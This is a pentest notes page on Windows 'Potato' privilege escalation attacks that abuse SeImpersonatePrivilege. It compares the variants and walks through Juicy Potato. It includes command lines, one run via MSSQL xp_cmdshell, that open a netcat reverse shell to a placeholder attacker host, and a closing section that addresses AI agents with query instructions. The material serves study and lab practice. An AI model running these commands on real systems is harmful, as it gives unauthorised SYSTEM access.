# Potatoes ## About **Potato-styled attacks** is **Windows privilege escalation techniques** that exploit **token impersonation****, ****NTLM relay****, and ****COM/DCOM misconfigurations** to gain `SYSTEM` privileges from a lower-privileged service account. These attacks target specific **privileges assigned to service accounts**, such as: * `SeImpersonatePrivilege` – Allows impersonation of another user's token. * `SeAssignPrimaryTokenPrivilege` – Allows assignment of a token to a process. ### Common Principles: 1. **Privilege Escalation via Token Impersonation** * They exploit `SeImpersonatePrivilege` to impersonate a SYSTEM token. * Some variants also abuse `SeAssignPrimaryTokenPrivilege` to assign SYSTEM tokens to processes. 2. **Exploitation of Windows Authentication or COM Services** * **Older Potatoes (Rotten, Juicy)**: Use **DCOM activation** to trigger SYSTEM-level COM objects. * **Newer Potatoes (Sweet, Bad, Rogue, Print)**: Leverage **NTLM authentication relay** and **RPC abuse** to request privileged tokens. 3. **No Exploits Needed – Just Misuse of Windows Features** * These attacks work **without exploiting a software vulnerability**—they abuse **legitimate Windows functionalities** like COM objects, NTLM relay, and DCOM interfaces. ### **Comparison of Major Potato Attacks** | **Exploit** | **Method Used** | **Target Privileges** | **Works on Modern Windows?** | | ----------------- | ---------------------------------- | ----------------------------------------------------------------------------------------------------------------------------- | ------------------------------- | | **Rotten Potato** | NTLM Relay (Fake RPC server) | `SeImpersonatePrivilege` | ❌ (Patched) | | **Juicy Potato** | COM Object Spoofing (CLSID) | `SeImpersonatePrivilege` | ❌ (Patched, requires CLSID) | | **Sweet Potato** | NTLM Relay via DCOM Task Scheduler | `SeImpersonatePrivilege`, `SeAssignPrimaryTokenPrivilege` | ✅ (Works on modern Windows) | | **Rogue Potato** | RPC/DCOM NTLM Capture | `SeImpersonatePrivilege` | ✅ (Bypasses Juicy Potato patch) | | **PrintSpoofer** | Named Pipe + Print Spooler Trick | `SeImpersonatePrivilege` | ✅ (Works on modern Windows) | ## Juicy Potato In Windows, every process has a **token containing account information**, which can be exploited if the `SeImpersonatePrivilege` privilege is available. This privilege, often found in **service accounts**, allows a process to impersonate another, enabling privilege escalation from **Administrator to SYSTEM**. Legitimate programs use this for tasks like calling **WinLogon** to obtain a SYSTEM token. Attackers exploit this via **Potato-style attacks** tricking a SYSTEM process into connecting to a malicious one, allowing token theft. This privilege is common in **web shells, Jenkins RCE, and MSSQL command execution**. If found, it often provides an easy path to SYSTEM access. Always check for it after gaining code execution. ### **Example** ```sql SQL> xp_cmdshell c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 13.13.13.13 1337 -e cmd.exe" -t * ``` 1. **Execute Juicy Potato via** `xp_cmdshell` * `xp_cmdshell` allows OS command execution in **SQL Server**. * If enabled, it can run Juicy Potato under the SQL Server service account. * The service account often has `SeImpersonatePrivilege`, which is required for Juicy Potato. 2. **Abuse Token Impersonation** * Juicy Potato listens on port `53375` for a COM request (`-l 53375`). * It spawns `cmd.exe` (`-p c:\windows\system32\cmd.exe`) and executes a **reverse shell** with `nc.exe`. * The attack succeeds if the SQL Server service can **impersonate SYSTEM**. 3. **Reverse Shell Execution via Netcat** * `cmd.exe` runs with SYSTEM privileges and executes: ```bash c:\tools\nc.exe 13.13.13.13 1337 -e cmd.exe ``` * This connects back to **13.13.13.13:1337 (attacker host)**, giving an attacker **SYSTEM** shell access. ### Example 2 I used this example for one task in Academy, used it from command injection powershell reverse shell ```powershell .\JuicyPotato.exe -l 53375 -c "{7A6D9C0A-1E7A-41B6-82B4-C3F7A27BA381}" -p c:\windows\system32\cmd.exe -a "/c c:\windows\temp\nc.exe -e cmd.exe 13.13.13.13 9999" -t * ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://venator17.gitbook.io/bibliotheque/windows/privilege-escalation/privilege-abuse/potatoes.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.